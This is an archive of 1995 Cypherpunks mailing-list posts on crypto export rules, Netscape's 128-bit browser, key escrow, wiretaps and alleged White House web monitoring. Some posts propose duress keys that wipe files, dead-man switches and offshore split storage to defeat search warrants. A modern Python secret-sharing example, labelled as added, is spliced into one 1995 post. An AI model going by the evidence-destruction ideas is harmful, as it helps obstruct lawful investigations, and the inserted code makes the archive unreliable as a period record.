Specifically, the sites, "Washington Weekly" (http://www.federal.com), "The Whitewater Scandal Home Page" (http://www.cs.dartmouth.edu/~crow/whitewater/) "Whitewater & Vince Foster" (http://www.cris.com/~dwheeler/n/whitewater/whitewater-index.html) have been visited by White House computers ist1.eop.gov, ist6.eop.gov, ist7.eop.gov, and gatekeeper.eop.gov between August 28 and August 31, and a total of 128 files have been transferred to those White House computers. For all sites, this constitutes a significant increase over previous access by White House computers. In light of this information, I have the following questions: (1) Does this constitute "casual browsing" by White House staff, or is it, in light of the considerable time and effort spent during regular business hours, part of a monitoring or intelligence operation? (2) For what purpose is the information transferred to the White House used? (3) Does the White House keep information from these web sites on file, and does the White House keep a file on the persons responsible for these web sites? (4) Is the April 9 statement by David Lytel of the White House Office of Science and Technology to Amy Bauer of Copley News Service that the administration does not monitor anti-Clinton activity on the web still operative? Thank you very much for your cooperation in this matter. Sincerely, Marvin Lee The Washington Weekly Copyright (c) 1995 The Washington Weekly (http://www.federal.com) ---------------------------------------------------------------------------- To find out more about the anon service, send mail to help at anon.penet.fi. If you reply to this message, your message WILL be *automatically* anonymized and you are allocated an anon id. Read the help file to prevent this. Please report any problems, inappropriate use etc. to admin at anon.penet.fi. 
From rah at shipwright.com Tue Sep 12 10:54:49 1995 From: rah at shipwright.com (Robert Hettinga) Date: Tue, 12 Sep 95 10:54:49 PDT Subject: Payment Systems Message-ID: --- begin forwarded text From: "John Hemming CEO MarketNet" Date: Tue, 12 Sep 1995 15:38:00 PM PDT To: www-buyinfo at allegra.att.com Mime-Version: 1.0 Subject: Payment Systems For the edification of those concerned we have issued our first Electronic Cheque today. The browser now has been tested linking signed instructions directly to the web. The browser, however, is still being developed to resolve the problems with shortage of space in Windoze DGROUP. There is a copy of the browser at ftp://193.119.26.70/mktnet/pub/echeque.zip (or something similar) we would recommend waiting a while before you take it however and to take the horse.zip as well because of the DGROUP issue). The only form that will accept Echeques at the moment is http://193.118.187.107/load ordflow The trick in this form (if you are using our browser) is that it allows payment either by ECheque or by credit card and only generates the signed instruction for echeques. The signed instruction is then sent to our servers encrypted with 128 bit RC4. ttfn John --- end forwarded text ----------------- Robert Hettinga (rah at shipwright.com) Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131 USA (617) 323-7923 "Reality is not optional." --Thomas Sowell >>>>Phree Phil: Email: zldf at clark.net http://www.netresponse.com/zldf <<<<< From aba at dcs.exeter.ac.uk Tue Sep 12 11:00:12 1995 From: aba at dcs.exeter.ac.uk (aba at dcs.exeter.ac.uk) Date: Tue, 12 Sep 95 11:00:12 PDT Subject: PGP duress code, and stego (was Re: PGP in UK - snooped unSTEALHed?) 
Message-ID: <26623.9509121759@exe.dcs.exeter.ac.uk> erm darn, I posted a huge post which should have the above subject, but instead came out with the subject line: Re: Returned mail: User unknown due to typo, could someone replying please correct that, if following up, I won't bother posting it again in respect of those who actually pay for their mail feed per k. It had a lot of questions which I'd really like people to look at, skip back a few, and take a read, it's for the implementation of stealth2, Henry Hasturs stealth util. Adam From an215712 at anon.penet.fi Tue Sep 12 11:06:11 1995 From: an215712 at anon.penet.fi (an215712 at anon.penet.fi) Date: Tue, 12 Sep 95 11:06:11 PDT Subject: Whitehouse responds to Zimmermann pardon letter Message-ID: <9509121750.AA19433@anon.penet.fi> ---------------------------------------------------------------------------- To find out more about the anon service, send mail to help at anon.penet.fi. If you reply to this message, your message WILL be *automatically* anonymized and you are allocated an anon id. Read the help file to prevent this. Please report any problems, inappropriate use etc. to admin at anon.penet.fi. From kelli at zeus.towson.edu Tue Sep 12 11:19:50 1995 From: kelli at zeus.towson.edu (K. M. Ellis) Date: Tue, 12 Sep 95 11:19:50 PDT Subject: NIST conference summary in CDT Message-ID: The Center for Democracy in Technology policy posting no. 24 provides a pretty good summary of the NIST conference. If anyone is interested, e-mail me privately and I can forward it to you. -=Kathleen M. 
Ellis=- kelli at zeus.towson.edu Geek Code v3.0 http://zeus.towson.edu/~kelli/ GAT dx s++:- a-- C++ uu+++ P+ L++ E- W++ N K W--- O- M- V-- PS+++ PE- y+>+(-) PGP+>++ t+ 5 x+ R tv b+++ DI- D--- G e h* r+ z** Diverse Sexual Orientation Coll.Towson State University DSOC at zeus.towson.edu From sameer at c2.org Tue Sep 12 12:44:31 1995 From: sameer at c2.org (sameer) Date: Tue, 12 Sep 95 12:44:31 PDT Subject: Elliptic Curve Public Key Crypto In-Reply-To: <199509121620.JAA08381@well.com> Message-ID: <199509121939.MAA25838@infinity.c2.org> ftp.csua.berkeley.edu > > > > Mike Rosing writes: > > >in the cypherpunks ftp site /pub/cypherpunks/ciphers are 2 ascii > >files. One contains code and the other contains documentation: > >eliptic.src and elliptic.doc. The code portion is a cat'ed block > >of files: headers, C sources and a set of prime numbers. The > >documentation attempts to explain the math, but it does help if > >you already know number theory. It hopefully isn't necessary. > > Thanks Mike for all your effort!! > > Now could someone remind me where the Cypherpunks FTP site is? > > Please? > > Brian D Williams > Cypherpatriot > > " Zen? Well it beats sitting around on your ass all day doing > nothing! " > -- sameer Voice: 510-601-9777 Network Administrator FAX: 510-601-9734 Community ConneXion: The NEXUS-Berkeley Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From cwe at Csli.Stanford.EDU Tue Sep 12 12:49:59 1995 From: cwe at Csli.Stanford.EDU (Christian Wettergren) Date: Tue, 12 Sep 95 12:49:59 PDT Subject: Netscape to patch shareware version In-Reply-To: Message-ID: <199509121948.MAA03663@Csli.Stanford.EDU> | Meanwhile, in an as yet unannouced move, the company said it would place | its commercial browser online for free downloading. [..] THe commercial | version, sold only in the U.S. contains an unbreakable 128-bit | encryption scheme. Hurray! We did it! We did it! 
:-) | Netscape said it received word last week that the State Department had | cleared that version for release on the Net, but only within the U.S., | owing to current export laws banning the export of encryption schemes | stronger than 40 bits. THe company could provide no details by press | time on how it would ensure that the 128-bit version wouldn't leak beyond | U.S. borders. Ok, any bet on how long it will take? | The cypherpunks forced a situation where Net users now have better | encryption available to them. I'd say this is a big win. The power of the Net is actually quite astonishing at times. The plotting in Ender's Game isn't all that unrealistic after all. (Oh, well, ruler of the world is a bit of still. ;-)) /Christian From pfarrell at netcom.com Tue Sep 12 13:01:10 1995 From: pfarrell at netcom.com (Pat Farrell) Date: Tue, 12 Sep 95 13:01:10 PDT Subject: DC-C'punks meeting Message-ID: <199509121958.MAA01005@netcom3.netcom.com> Sorry to waste list bandwidth for the 600 folks too far away to care about this... The next DC-area c'punks meeting will be September 16, it will be at the Digex headquarters offices in Beltsville, probably starting about 3:00 PM. Digital Express Group 6800 Virginia Manor Road Beltsville Maryland 20705 (301) 847-5000 Directions to DIGEX >From the Washington Beltway (I495) in Maryland, take Route 1 North. drive on Route 1 a few miles, maybe as many as three or four. You will see a Ritz Camera Center. Turn left onto Ritz Way. At the second street, turn Right onto Virginia Manor Road. You are now near 6800 Virginia Manor Road. Digex is the last building on the Right. If you need more information, email me, or see my http://www.isse.gmu.edu/~pfarrell/dccp page. Pat Pat Farrell grad student http://www.isse.gmu.edu/students/pfarrell Infor. 
Systems and Software Engineering, George Mason University, Fairfax, VA PGP key available via finger or request #include standard.disclaimer From carolann at censored.org Tue Sep 12 13:08:34 1995 From: carolann at censored.org (Censored Girls Anonymous) Date: Tue, 12 Sep 95 13:08:34 PDT Subject: Netscape to patch shareware version Message-ID: <199509122007.NAA17074@usr3.primenet.com> As fast as it takes to FTP it over there. I have copies of every server Netscape's got, although I haven't unpacked them or used them. Will this take up another 75 megs on the HD? Lover Always, Carol Anne.....dreaming of her own web server someday. >| Meanwhile, in an as yet unannouced move, the company said it would place >| its commercial browser online for free downloading. [..] THe commercial >| version, sold only in the U.S. contains an unbreakable 128-bit >| encryption scheme. >Ok, any bet on how long it will take? > >/Christian -- Member Internet Society - Certified BETSI Programmer - Webmistress *********************************************************************** Carol Anne Braddock (cab8) carolann at censored.org 206.42.112.96 My Homepage The Cyberdoc *********************************************************************** ------------------ PGP.ZIP Part [017/713] ------------------- M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M MF=O0H+*%(-S%&>S%+FS& http://dcs.ex.ac.uk/~aba/export/ From keelings at wu1.wl.aecl.ca Tue Sep 12 13:17:31 1995 From: keelings at wu1.wl.aecl.ca (S. Keeling) Date: Tue, 12 Sep 95 13:17:31 PDT Subject: Scientology tries to break PGP - and Message-ID: <9509121731.AA10786@wu1.wl.aecl.ca> Incoming from Henry W. Farkas: > [snip] > When the safety is finally removed from the gun at your head (sorry for > the drama) you hand over your alternate secret key. If decrypted with the > "alternate" or "fake" secret key, the encrypted file is wiped until it > reaches a marker; the remainder of the file is displayed. 
If you use your > "primary" or "real key", the extraneous text is simply stripped. I would just like to point out that, when a LEA comes to you to get at the contents of your computer, (s)he is not going to patiently wait while your system wipes the offending evidence off your hard disk. The first thing they do is make a copy of everything, so they can work from the copy. Besides, you do have backup tapes laying around all over the place, don't you? -- "Remember, obsolescence (Win95) isn't an accident; it's an art form!" keelings at wu1.wl.aecl.ca s. keeling, aecl - whiteshell labs From gjeffers at socketis.net Tue Sep 12 13:25:26 1995 From: gjeffers at socketis.net (Gary Jeffers) Date: Tue, 12 Sep 95 13:25:26 PDT Subject: Secure Device 1.4 (secdr14.zip) Message-ID: <199509122327.SAA25529@mail.socketis.net> Dear fellow Cypherpunks, Could someone send me Secure Device 1.4 (Secdr14.zip) ? My ftp software won't accept the huge directory path needed to point at the package on U.S. servers. I am an American citizen at an American site who knows the export regulations. Thank You, Gary Jeffers From mclow at coyote.csusm.edu Tue Sep 12 13:50:40 1995 From: mclow at coyote.csusm.edu (Marshall Clow) Date: Tue, 12 Sep 95 13:50:40 PDT Subject: Netscape to patch shareware version Message-ID: >| Meanwhile, in an as yet unannouced move, the company said it would place >| its commercial browser online for free downloading. [..] THe commercial >| version, sold only in the U.S. contains an unbreakable 128-bit >| encryption scheme. > >Hurray! We did it! We did it! :-) Indeed. Congratulations to Damien, Adam, and all the other people who contributed cycles to the "Cypherpunks Key Breaking Ring". > >| Netscape said it received word last week that the State Department had >| cleared that version for release on the Net, but only within the U.S., >| owing to current export laws banning the export of encryption schemes >| stronger than 40 bits. 
THe company could provide no details by press >| time on how it would ensure that the 128-bit version wouldn't leak beyond >| U.S. borders. > I suspect Netscape will do the minimum so that they will not be held liable. >Ok, any bet on how long it will take? > Less than 3 hours. >| The cypherpunks forced a situation where Net users now have better >| encryption available to them. I'd say this is a big win. > >The power of the Net is actually quite astonishing at times. The >plotting in Ender's Game isn't all that unrealistic after all. (Oh, >well, ruler of the world is a bit of still. ;-)) > Demosthenes From jya at pipeline.com Tue Sep 12 13:51:22 1995 From: jya at pipeline.com (John Young) Date: Tue, 12 Sep 95 13:51:22 PDT Subject: GAK/weak crypto rationale? Message-ID: <199509122051.QAA14953@pipe4.nyc.pipeline.com> Responding to msg by Andrew.Spring at ping.be (Andrew Spring) on Tue, 12 Sep 7:3 PM >A more cautious conclusion would be would be that the >importance (to the LEA's) of the busts made with >crypto is much larger than the numbers suggest. You >could interpret that a lot of ways: I suspect that >high-profile career-enhancing cases are highly >dependent on wiretaps. In response to an audience question about wiretaps and crypto, Mr. Michael Nelson of the White House said at the NIST GAK meeting (paraphrased): We are not concerned with bad people using crypto among themselves, we can handle that. We are more concerned with their using crypto to communicate with regular folks, to make legitimate arrangements -- finance, supplies, travel, and so on -- for their nefarious deeds. It's the intermix of the bad with the good that's the problem. Maybe someone else at the meeting heard this differently and will comment, but this seems to mean that the Feds can track, and maybe crack, the crypto-intercomm of "bad people" so long as it is not buried in a torrent of public crypto use. And not commingled with lawful, ECPA- protected(?), communication. 
Anybody want to elaborate what Mr. Nelson was implying about wiretaps and crypto? From anon-remailer at utopia.hacktic.nl Tue Sep 12 14:00:35 1995 From: anon-remailer at utopia.hacktic.nl (Anonymous) Date: Tue, 12 Sep 95 14:00:35 PDT Subject: Netscape to patch shareware version Message-ID: <199509122100.XAA13066@utopia.hacktic.nl> >| Netscape said it received word last week that the State Department had >| cleared that version for release on the Net, but only within the U.S., >| owing to current export laws banning the export of encryption schemes >| stronger than 40 bits. THe company could provide no details by press >| time on how it would ensure that the 128-bit version wouldn't leak beyond >| U.S. borders. > >Ok, any bet on how long it will take? It's already been exported. Evidently, one of those who bought the commercial version sent it to Europe as soon as it was out. I note the site removed it, however, probably because Netscape Comm. Inc. requested that they do so. Netscape generally objects to anyone else carrying their browser (.edu sites with prior permission excepted). From adam at rosa.com Tue Sep 12 14:00:54 1995 From: adam at rosa.com (Adam Philipp) Date: Tue, 12 Sep 95 14:00:54 PDT Subject: VOO_doo Message-ID: --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\ |PGP key available on my home page|Unauthorized interception violates | | http://www.rosa.com/~adam |federal law (18 USC Section 2700 et| |-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-|seq.). In any case, PGP encrypted | |SUB ROSA: Confidential, |communications are preferred for | |secret, not for publication. |sensitive materials. | \-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-/ From tcmay at got.net Tue Sep 12 14:07:02 1995 From: tcmay at got.net (Timothy C. May) Date: Tue, 12 Sep 95 14:07:02 PDT Subject: Key Escrow as Law Enforcement's *Worst Nightmare* Message-ID: "Be careful what you ask for--you might get it." 
(Albanian Proverb) I'll summarize my post with my last line: In short, key escrow could be law enforcement's worst nightmare, as it truly opens up the Web as a worldwide, distributed file system. At 6:31 PM 9/12/95, S. Keeling wrote: > I would just like to point out that, when a LEA comes to you >to get at the contents of your computer, (s)he is not going to >patiently wait while your system wipes the offending evidence off your >hard disk. The first thing they do is make a copy of everything, so >they can work from the copy. Besides, you do have backup tapes laying >around all over the place, don't you? This is a main reason why "key escrow" is a double-edged sword for Law Enforcement. That is, it is not an unadulterated "win" for them. Consider the easy availability of a "key escrow" system (I'm deliberately avoiding calling it either SKE, or CKE, or GAK) in which files may be locally encrypted with the files, local decryption software, etc., stored locally--but with efficient fast-erase methods (ranging from the oft-mentioned "thermite charge" to a more user-friendly overvoltage to fry the motherboard (for example, just to make the point). (My point is not to speculate on what a "dead man switch" might look like, but merely to look at the implications of widespread key escrow and data destruction tools.) Key escrow, with the keys deposited safely with one's "Family" (in both senses of the term), and/or with one's lawyer, and/or in offshore locations) could make the use of dead man switches much "safer." A numbers game operator can rest easy in flushing his computer, knowing key escrow and remote storage exists. "Remote storage"? Sure, the Web offers easy and transparent ways to split files up and store them in various locales. Kind of makes "search warrants" a problem, doesn't it? The promise of the Web, to many of us, is that URLs essentially make the machines accessible via the Web into a kind of huge, distributed file system. 
Remote sites can already be used for storage, obviously. The Web offers a new degree of automation of the process, with many interesting possibilities.

An interesting project would be to build tools similar to ftp for automatic backup of files to remote locations, perhaps locations that accept "deposits" for a fee. (In digital money tokens, even.) The tool could do multi-part splitting, and could encrypt the files. Keys (and the locations of the parts) could independently exploit the kind of "key escrow" mentioned above.

So, a raid is made on a site. The files are not found there, as they have been automatically filed on other sites, with the key/location info escrowed with escrow agents who are not cooperative with search warrants, subpoenas, etc. (It may be sufficient for a person to "remember" the N sites, as the sites may be uncooperative enough so as to make it impossible for the law enforcement people to "demand" access to files. I can discuss this further. While not "secure" in a strong crypto sense, in practice this will be pretty effective--after all, the pieces are similar to offshore bank account access info, and law enforcement is pretty much powerless to get N countries/banks to cooperate on a blanket search.)

In short, key escrow could be law enforcement's worst nightmare, as it truly opens up the Web as a worldwide, distributed file system.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."
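The k-of-n "key escrow" Tim May sketches above, with the file key deposited with one's family, lawyer and offshore agents so that no single holder (and no single raided site) can release it, is what the standards literature calls split knowledge. The Python below is an added example written for this archive; it is not code from the post or from any project mentioned in the thread. It implements Shamir secret sharing over GF(2^8), one byte at a time, using only the standard library; the agent names and the 3-of-5 policy are constructed for illustration, and encrypting and distributing the file itself is left out, so the example covers only the key.

```python
"""Split-knowledge escrow of a file key: Shamir secret sharing over GF(2^8).

Added example (not from the original post).  Any THRESHOLD of the
constructed AGENTS can reconstruct the key; fewer learn nothing about it.
"""
import secrets
from typing import Dict, List, Sequence, Tuple

Share = Tuple[int, bytes]  # (x coordinate 1..255, one y byte per secret byte)


def gf_mul(a: int, b: int) -> int:
    """Multiply in GF(2^8) modulo the AES polynomial x^8 + x^4 + x^3 + x + 1."""
    r = 0
    while b:
        if b & 1:
            r ^= a
        a <<= 1
        if a & 0x100:
            a ^= 0x11B
        b >>= 1
    return r


def gf_inv(a: int) -> int:
    """Multiplicative inverse as a^254 (non-zero elements form a group of order 255)."""
    r, base, e = 1, a, 254
    while e:
        if e & 1:
            r = gf_mul(r, base)
        base = gf_mul(base, base)
        e >>= 1
    return r


def split_secret(secret: bytes, n: int, k: int) -> List[Share]:
    """Produce n shares of which any k reconstruct `secret`.

    For each secret byte s a random polynomial p(x) = s + a1*x + ... + a_{k-1}*x^(k-1)
    is drawn and share i receives p(i).  Fewer than k points leave s undetermined.
    """
    if not 1 <= k <= n <= 255:
        raise ValueError("need 1 <= k <= n <= 255")
    ys: List[bytearray] = [bytearray() for _ in range(n)]
    for s in secret:
        coeffs = [s] + [secrets.randbelow(256) for _ in range(k - 1)]
        for x in range(1, n + 1):
            y = 0
            for c in reversed(coeffs):  # Horner's rule, highest coefficient first
                y = gf_mul(y, x) ^ c
            ys[x - 1].append(y)
    return [(x, bytes(ys[x - 1])) for x in range(1, n + 1)]


def recover_secret(shares: Sequence[Share]) -> bytes:
    """Lagrange-interpolate each byte's polynomial at x = 0.

    Too few shares do not raise an error; they yield an unrelated value.
    That is the property the escrow relies on: arithmetic cannot tell the
    holder of two shares anything, so the "how many agents" check is policy.
    """
    xs = [x for x, _ in shares]
    if len(set(xs)) != len(xs):
        raise ValueError("duplicate share index")
    out = bytearray()
    for i in range(len(shares[0][1])):
        acc = 0
        for xj, yj in shares:
            num = den = 1
            for xm, _ in shares:
                if xm != xj:
                    num = gf_mul(num, xm)       # (0 - xm) equals xm in characteristic 2
                    den = gf_mul(den, xj ^ xm)  # xj - xm
            acc ^= gf_mul(yj[i], gf_mul(num, gf_inv(den)))
        out.append(acc)
    return bytes(out)


# Constructed escrow policy for the example: five holders, any three release the key.
AGENTS = ("family", "lawyer", "offshore-1", "offshore-2", "offshore-3")
THRESHOLD = 3


def escrow_file_key() -> Tuple[bytes, Dict[str, Share]]:
    """Generate a fresh 256-bit file key and hand one share to each agent."""
    key = secrets.token_bytes(32)
    shares = split_secret(key, len(AGENTS), THRESHOLD)
    return key, dict(zip(AGENTS, shares))


def release_key(held: Dict[str, Share], cooperating: Sequence[str]) -> bytes:
    """Reconstruct the key from whichever agents actually cooperate."""
    return recover_secret([held[name] for name in cooperating])


if __name__ == "__main__":
    key, held = escrow_file_key()
    assert release_key(held, ("lawyer", "offshore-2", "family")) == key
    assert release_key(held, ("lawyer", "family")) != key  # two holders learn nothing
    print("3-of-5 escrow reconstructs the key; 2-of-5 yields garbage")
```

Run directly, the block splits a fresh key and shows that three agents recover it while two do not. The design choice worth noticing is that `recover_secret` does not check how many shares it was given: with fewer than k shares every candidate key is equally consistent with what the holder has, so the threshold is enforced by who agrees to hand over a share, exactly the "uncooperative escrow agents" the post describes, not by anything a seized share could reveal.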
From lindat at iquest.net Tue Sep 12 14:07:34 1995
From: lindat at iquest.net (Linda Thompson, American Justice Federation)
Date: Tue, 12 Sep 95 14:07:34 PDT
Subject: Whitehouse "dissident" web site monitoring?
Message-ID:

>To: cypherpunks at toad.com
>From: an215712 at anon.penet.fi
>X-Anonymously-To: cypherpunks at toad.com
>Organization: Anonymous forwarding service
>Reply-To: an215712 at anon.penet.fi
>Date: Tue, 12 Sep 1995 17:17:15 UTC
>Subject: Whitehouse "dissident" web site monitoring?
>
>- ----------------------------------------------------------
>
>       WHITE HOUSE MONITORING OF DISSIDENTS ON THE INTERNET
>
>
>The National Security Agency presumably can monitor
>subversive communication on the Internet without leaving any
>trace by "sniffing packets" at traffic nodes. For purely
>political purposes, however, the White House may be forced to do
>the monitoring in-house, which means that they leave traces
>everywhere they go.
>
>With just a superficial search for such traces, The
>Washington Weekly has uncovered intensive monitoring of
>"dissident" Internet sites by the White House.
>
>It turns out that computers from inside the White House have
>kept pretty good tabs on information available on Whitewater,
>Vince Foster, and Mena at a few key repositories on the World-
>Wide Web, a subset of the Internet.
>
>Just three such sites: "The Washington Weekly," "The
>Whitewater Scandal Home Page" and "Whitewater & Vince Foster,"
>were accessed 128 times by four computers from the Executive
>Office of the President between August 28 and August 31. If the
>White House is showing a similar interest in other sites on the
>World Wide Web, that would amount to a monitoring operation of
>considerable magnitude. Tim Brady of the Yahoo! World-Wide Web
>index says that his company alone has indexed approximately 725
>political sites.
>That monitoring effort would be nothing,
>however, compared to the effort required to follow all anti-
>Clinton discussion on the Usenet, another subset of the Internet.
>
>The White House did not respond to an inquiry (attached
>below) asking for an explanation and asking whether this
>constituted "casual browsing."
>
>Interestingly, the week after the White House snooping of
>files, which included a series of articles by J. Orlin Grabbe on
>Vince Foster's ties to the NSA, the following little piece
>appeared in Newsweek Magazine:
>
>  "Conspiracy theorists perked up when Deborah Gorham told Senate
>  Whitewater investigators in June that her boss, the late deputy
>  White House counsel Vince Foster, asked her to put two secret
>  notebooks from the National Security Agency in a White House
>  safe. The suggestion that Foster dealt with the NSA sparked
>  feverish speculation on the Internet that he was involved in
>  espionage. The reality appears more prosaic. The White House
>  won't give details, but sources say Foster's files dealt with
>  legal questions about national emergencies...."

====================================================

During the Waco Hearings, Charles Schumer said he'd seen Foster's missing file and all it had in it was a memorandum about "Linda Thompson and THAT tape." Now, put that with the "sources say Foster's files dealt with legal questions about national emergencies . . . ." and I will presume that "THAT tape" and I constitute a "national emergency." Harumph. At any rate, we've (AEN News) had a number of military-based sniffs here.

-- Linda

================================================

>Does the White House follow anti-Clinton discussion on Usenet
>newsgroups just as closely? The White House posts press releases
>to Usenet in collaboration with the Artificial Intelligence Lab
>at Massachusetts Institute of Technology. But MIT System
>Administrator Bruce Walton says that the White House does not use
>the same server for reading netnews.
>It would be difficult -
>although not impossible - to find the server that the White House
>uses for reading or receiving netnews and check for traces on
>that server.
>
>Readers may be tempted to post a threat to the President on a
>newsgroup just to see if they get a visit from the Secret Service
>the next day. That experiment is not advisable. It is a criminal
>offense. But Usenet just might be a faster conduit for getting
>the attention of the administration than the email address that
>the White House has published for the president.
>
>Attachment:
>
>
>                   THE WASHINGTON WEEKLY
>_________________________________________________________________
>
>August 31, 1995
>
>Virginia M. Terzano
>White House Office of the Press Secretary
>The White House
>
>
>Dear Ms. Terzano:
>
>It has come to my attention that several dissident sites on
>the World Wide Web have been visited by White House computers
>this week. Apparently, all information regarding Whitewater,
>Foster, and Mena has been transferred to White House computers.
>
>Specifically, the sites,
>
>"Washington Weekly" (http://www.federal.com),
>"The Whitewater Scandal Home Page"
>(http://www.cs.dartmouth.edu/~crow/whitewater/)
>"Whitewater & Vince Foster"
>(http://www.cris.com/~dwheeler/n/whitewater/whitewater-index.html)
>
>have been visited by White House computers ist1.eop.gov,
>ist6.eop.gov, ist7.eop.gov, and gatekeeper.eop.gov between August
>28 and August 31, and a total of 128 files have been transferred
>to those White House computers. For all sites, this constitutes a
>significant increase over previous access by White House
>computers.
>
>In light of this information, I have the following questions:
>
>(1) Does this constitute "casual browsing" by White House staff, or
>    is it, in light of the considerable time and effort spent during
>    regular business hours, part of a monitoring or intelligence operation?
>
>(2) For what purpose is the information transferred to the White House used?
>
>(3) Does the White House keep information from these web sites on file,
>    and does the White House keep a file on the persons responsible for
>    these web sites?
>
>(4) Is the April 9 statement by David Lytel of the White House Office of
>    Science and Technology to Amy Bauer of Copley News Service that the
>    administration does not monitor anti-Clinton activity on the web still
>    operative?
>
>
>Thank you very much for your cooperation in this matter.
>
>Sincerely,
>
>Marvin Lee
>The Washington Weekly
>
>Copyright (c) 1995 The Washington Weekly (http://www.federal.com)
>
>
>

Linda Thompson
American Justice Federation
Home of AEN News and "Waco, the Big Lie"
"America Under Siege"
3850 S. Emerson Ave.
Indianapolis, IN 46203
Telephone: (317) 780-5200
Fax: (317) 780-5209
Internet: lindat at iquest.net

"When even one American -- who has done nothing wrong -- is forced by fear to shut his mind and close his mouth, then all Americans are in peril." Harry Truman

From kelso at netcom.com Tue Sep 12 14:17:31 1995
From: kelso at netcom.com (Tom Rollins)
Date: Tue, 12 Sep 95 14:17:31 PDT
Subject: Scientology tries to break PGP - and (fwd)
Message-ID: <199509122056.NAA19963@netcom19.netcom.com>

> I would just like to point out that, when a LEA comes to you
> to get at the contents of your computer, (s)he is not going to
> patiently wait while your system wipes the offending evidence off your
> hard disk. The first thing they do is make a copy of everything, so
> they can work from the copy. Besides, you do have backup tapes laying
> around all over the place, don't you?

Sounds like a recommendation for SFS (Secure File System). It encrypts everything going to the disk. I used an SFS partition for a while. But, I swap between DOS and Linux. Haven't seen SFS for Linux yet.

Later,
Tom

From bdavis at thepoint.net Tue Sep 12 14:45:29 1995
From: bdavis at thepoint.net (Brian Davis)
Date: Tue, 12 Sep 95 14:45:29 PDT
Subject: GAK/weak crypto rationale?
In-Reply-To:
Message-ID:

On Tue, 12 Sep 1995, Andrew Spring wrote:

> >intercepts requested and authorized in the past year. As I recall, the
> >number was quite small - around 12K [?]. Someone had found this out
> >through an FOIA request, perhaps, (my recollection of it is poor). It was
>
> I think it's about 1200.
>
> >not a large number, anyway. I must conclude that the actual number of
> >intercepts is much, much larger than they are saying, and that they must
> >be getting what they perceive to be good intel from all this snooping.
> >
>
> A more cautious conclusion would be that the importance (to the
> LEA's) of the busts made with crypto is much larger than the numbers
> suggest. You could interpret that a lot of ways: I suspect that
> high-profile career-enhancing cases are highly dependent on wiretaps.

No question. Many high profile public corruption, Mafia, and high-level narcotics trafficking cases are made with wiretaps. In our district, we managed to convict almost 20 people in an investigation of the state legislature, including the now-former Speaker of the House and > 6 other legislators. Bribing lobbyists took hits, etc. Particularly effective were the court-approved video and audio tapes of the Speaker taking a bribe in exchange for certain action on legislation and responding to the bribing party: "Well bless your heart." That has become the office's mantra. I understand the same was true of the South Carolina state legislature investigation (wiretaps).

A number of previous investigations of our legislature failed over the past 15 years as the stonewall held. Wiretaps, hidden microphones, and hidden cameras put corrupt politicians (I know - redundant) out of business.

I don't doubt that wiretaps may sometimes be abused despite the incredibly onerous review process, but they have positive aspects, too.

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame way!
I get treated worse in person every day!!

From jim at rand.org Tue Sep 12 14:53:28 1995
From: jim at rand.org (Jim Gillogly)
Date: Tue, 12 Sep 95 14:53:28 PDT
Subject: Friday (15 Sep) GAK meeting at NIST
Message-ID: <199509122153.OAA02242@mycroft.rand.org>

I was hoping to attend and enturbulate, but my schedule doesn't quite wrap around it. Here's the schedule and talking paper they sent when I inquired.

	Jim Gillogly
	Hevensday, 21 Halimath S.R. 1995, 21:48

----------------------------------------------------------------------------

                        WORKSHOP TENTATIVE AGENDA
                 Developing Federal Key Escrow Standards
                           September 15, 1995
                              Hilton Hotel
                         Gaithersburg, Maryland

 9:00  Welcome, Agenda Overview                      Miles Smid, NIST

       Goals and Objectives

 9:10  Discussion of Goals and Objectives            Ray Kammer, Deputy Director, NIST
 9:20  Initial Thoughts on Standards Development     Miles Smid, NIST
 9:30  Industry Perspectives (5-10 min max.)
       Note: We still have a few slots of 5 min. available. Please let
       Arlene Carlton (301-975-3240) know if you would like to make a
       formal presentation.
10:30  Break
10:45  Discussion

       Technical Considerations

11:00  Identifying Technical Issues                  Miles Smid, NIST
11:15  Discussion
12:00  Lunch
 1:30  Breakout sessions
 3:15  Break
 3:30  Breakout session reports
 4:15  Discussion
 4:30  Future Activities (Miles Smid, NIST)
 5:00  Close

Note: The workshop will be held September 15, 1995 (9:00 a.m. - 5:00 p.m.) at the Gaithersburg Hilton Hotel, 620 Perry Parkway, Gaithersburg, Maryland. The meeting will be open to the public, although seating is limited. Advance registration is requested, please contact Arlene Carlton on 301/975-3240, fax: 301/948-1784 or e-mail: carlton at micf.nist.gov.
(9/6/95)

---------------------

          Developing Federal Key Escrow Encryption Standards Workshop
                            September 15, 1995

                             Discussion Paper

In announcements made on August 17, 1995, the Government stated its intention to work with industry and other interested individuals to develop federal key escrow encryption standards, including those implementable in software. This standard, when developed and approved, will be used by federal agencies (and others, if they so choose) in conjunction with FIPS-approved encryption techniques.

The structure of the envisioned standard(s), its technical specificity, goals and objectives, important technical considerations, and issues of process must be addressed in order to move forward. Some of the more technical issues include:

 - Is a standard interface for the release of keys desirable?
 - What documentation is required?
 - How will operational procedures be developed?
 - How will conformance be validated?
 - Will security be evaluated? If so, under what criteria and by whom?
 - How will configuration control be maintained?
 - Are new FIPS-approved algorithms necessary?
 - Should escrowing be built into the Public Key Infrastructure?
 - Is a standard escrow system identification field needed?
 - Is split knowledge required?
 - Do systems which permit data to be encrypted for both storage and
   transmission need to provide for both types of escrow?
 - Does the government require special features (e.g., two hour access,
   continuous real-time decryption, etc.)?
 - Who will draft the standard? Timeframe?

